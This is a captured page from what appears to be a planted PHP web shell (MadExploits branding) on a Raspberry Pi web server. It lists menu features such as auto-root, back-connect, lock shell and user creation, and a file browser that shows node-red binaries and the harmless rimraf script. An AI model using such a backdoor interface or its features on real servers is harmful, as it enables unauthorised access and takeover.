Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
node-red /
node_modules /
.bin /
[ HOME SHELL ]
Name
Size
Permission
Action
detect-libc
371
B
-rw-r--r--
esparse
4.83
KB
-rw-r--r--
esvalidate
7.56
KB
-rw-r--r--
js-yaml
2.66
KB
-rw-r--r--
mime
1.17
KB
-rw-r--r--
mkdirp
731
B
-rw-r--r--
mqtt
733
B
-rw-r--r--
mqtt_pub
3
KB
-rw-r--r--
mqtt_sub
2.54
KB
-rw-r--r--
mustache
3.39
KB
-rwxr-xr-x
needle
1.04
KB
-rwxr-xr-x
node-pre-gyp
3.19
KB
-rwxr-xr-x
node-red-admin
749
B
-rw-r--r--
nopt
1.51
KB
-rw-r--r--
rc
109
B
-rw-r--r--
rimraf
1.17
KB
-rw-r--r--
semver
4.61
KB
-rw-r--r--
sshpk-conv
5.6
KB
-rwxr-xr-x
sshpk-sign
3.92
KB
-rwxr-xr-x
sshpk-verify
3.47
KB
-rwxr-xr-x
uglifyjs
20.54
KB
-rwxr-xr-x
uuid
1.54
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rimraf
#!/usr/bin/env node var rimraf = require('./') var help = false var dashdash = false var noglob = false var args = process.argv.slice(2).filter(function(arg) { if (dashdash) return !!arg else if (arg === '--') dashdash = true else if (arg === '--no-glob' || arg === '-G') noglob = true else if (arg === '--glob' || arg === '-g') noglob = false else if (arg.match(/^(-+|\/)(h(elp)?|\?)$/)) help = true else return !!arg }) if (help || args.length === 0) { // If they didn't ask for help, then this is not a "success" var log = help ? console.log : console.error log('Usage: rimraf <path> [<path> ...]') log('') log(' Deletes all files and folders at "path" recursively.') log('') log('Options:') log('') log(' -h, --help Display this usage info') log(' -G, --no-glob Do not expand glob patterns in arguments') log(' -g, --glob Expand glob patterns in arguments (default)') process.exit(help ? 0 : 1) } else go(0) function go (n) { if (n >= args.length) return var options = {} if (noglob) options = { glob: false } rimraf(args[n], options, function (er) { if (er) throw er go(n+1) }) }
Close